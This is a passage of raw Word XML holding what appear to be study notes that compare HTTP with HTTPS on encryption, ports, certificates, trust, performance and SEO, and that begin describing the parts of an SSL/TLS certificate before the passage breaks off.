      </w:r>
    </w:p>
    <w:p w14:paraId="26A7BB64" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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2. Encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCCAEFE"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HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4661FA93"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Data is not encrypted, so anyone with access to the communication channel (e.g., a hacker on the same Wi-Fi network) can read the transmitted data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D6AB00"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HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416AF16C"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Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It encrypts the data, ensuring that even if intercepted, the data cannot be easily read or tampered with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBC8E95" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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3. Port:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B6B581"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HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165E0BBA"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By default, HTTP uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>port 80</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F4ADB2"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HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B85850"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HTTPS uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>port 443</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C20B5F2" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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4. Certificate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF110A9"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HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7418CDBA"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No </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76994A75"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HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CA6E4D"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Requires an </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> issued by a trusted Certificate Authority (CA) to verify the identity of the server and establish the encrypted connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF66D4A" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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5. URL Prefix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CBB0AF"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HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E460CB5"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URL starts with http://.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50623B38"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HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6386A769"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The URL starts with https://. The "s" stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>secure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD15FB4" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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6. Trust:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E516032"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HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E435E7"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Does not provide any mechanism for validating the authenticity of the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F4D3A8"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HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4668ADDF"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Provides a way to verify the server’s identity using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> issued by a trusted authority, helping users know they are connecting to the legitimate server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E315AF" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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7. Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC3B3F6"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HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DBD8F5"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lastRenderedPageBreak/>
        <w:t>Generally faster than HTTPS since there’s no overhead for encryption and decryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1EFAC2"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HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3886B074"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lightly slower due to the encryption and decryption processes, but this difference is usually negligible for most modern systems and networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C3306" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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8. SEO Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AE41B4"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HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1B45AB"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Websites using HTTP may be marked as “Not Secure” in modern browsers, potentially affecting user trust and SEO ranking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4CA290"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HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40054874"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Google gives preference to HTTPS websites in search rankings. It is also marked as “Secure” in the browser, building trust with users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B95153" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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9. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171A60F"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HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFC5D2D"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uitable for public, informational websites where security is not critical (though even these are being migrated to HTTPS for better trust and SEO).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F4503"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HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165770BD"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Essential for websites that involve sensitive data like </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e-commerce</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>banking</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>online forms</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>login pages</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and any site that requires user authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338CC4AC" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A61D54C"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HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for non-sensitive data and does not provide encryption, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the secure version of HTTP, using SSL/TLS to encrypt data, protect user privacy, and ensure the authenticity of the website. With the growing emphasis on security, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has become the standard for most modern websites, particularly those handling user data or financial transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F42DFBC" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002A50E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="448C7CC2">
          <v:rect id="_x0000_i3593" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="091DDD4D" w14:textId="2C4129A1" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="002B5B56">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="889" w:name="_Toc196308369"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a certificate</w:t>
      </w:r>
      <w:r w:rsidR="004B26C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="889"/>
    </w:p>
    <w:p w14:paraId="0D700679" w14:textId="687C5156" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, specifically in the context of </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>digital certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that serves to authenticate the identity of a server (or client) and facilitate encrypted communication over a network. It is issued by a trusted third party called a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Certificate Authority (CA)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Certificates play a crucial role in establishing trust and ensuring the security of online transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB51A37" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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Key Components of a Digital Certificate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BB63AE"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ublic Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEBF0C9"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certificate contains the public key used to encrypt data sent to the server. It is part of asymmetric encryption, where the public key is used to encrypt and the private key is used to decrypt data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48814269"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ertificate Holder’s Identity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD857F"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certificate includes information about the entity to whom it is issued, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A571A53" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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ommon Name (CN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The domain name (e.g., </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00617E2C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
